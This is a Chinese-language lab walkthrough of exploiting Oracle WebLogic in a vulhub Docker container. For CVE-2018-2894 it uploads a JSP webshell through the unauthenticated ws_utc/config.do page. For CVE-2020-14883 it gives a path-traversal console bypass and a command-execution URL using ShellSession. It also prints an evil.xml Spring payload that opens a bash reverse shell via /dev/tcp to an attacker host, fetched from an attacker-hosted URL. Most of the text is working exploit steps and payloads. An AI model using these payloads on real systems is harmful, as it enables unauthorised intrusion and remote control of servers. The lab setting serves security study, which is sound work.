一、环境搭建
# 这里采用 vulhub/weblogic 的漏洞镜像搭建
docker pull vulhub/weblogic:12.2.1.3-2018
# 端口映射
docker run -di -p 7001:7001 -p 8055:8055 vulhub/weblogic:12.2.1.3-2018
二、漏洞信息收集
# 发现版本信息
WebLogic Server 版本: 12.2.1.3.0
# 漏洞信息
CVE-2018-2894
#影响版本
weblogic 12.1.3.0.0
weblogic 12.2.2.1.2
weblogic 12.2.2.1.3
CVE-2020-14883
#影响版本
weblogic 10.3.6.0.0
weblogic 12.1.3.0.0
weblogic 12.2.1.3.0
weblogic 12.2.1.4.0
weblogic 14.1.1.0.0
三、漏洞利用
3.1 CVE-2018-2894
1、访问 http://192.168.47.162:7001/ws_utc/config.do (不需要管理员权限就可以访问!)
2、修改 Work Home Dir 为:
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
3、抓包-上传木马
4、查看响应包,获取到时间戳
1607078122629
5、构造链接:http://192.168.47.162:7001/ws_utc/css/config/keystore/时间戳_木马名字
http://192.168.47.162:7001/ws_utc/css/config/keystore/1607078122629_shell.jsp
(浏览器页面访问 报错 5xx 也没有问题的!)
6、菜刀连接即可!
3.2 CVE-2020-14883
1、验证未授权: http://192.168.47.162:7001/console/css/%252e%252e%252fconsole.portal
# 一是通过com.tangosol.coherence.mvel2.sh.ShellSession
# 二是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
2、利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令,
直接访问url:
# 创建文件
http://192.168.47.162:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch /tmp/check2020%27);%22);
3、通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
加载外部 xml实体
evil.xml
# 反弹shell
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i >& /dev/tcp/192.168.xxx.xxx/2323 0>&1]]></value>
</list>
</constructor-arg>
</bean>
</beans>
4、访问:
http://192.168.47.162:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://192.168.xxx.xxx/evil.xml%22)
KEEP LEARNING!!!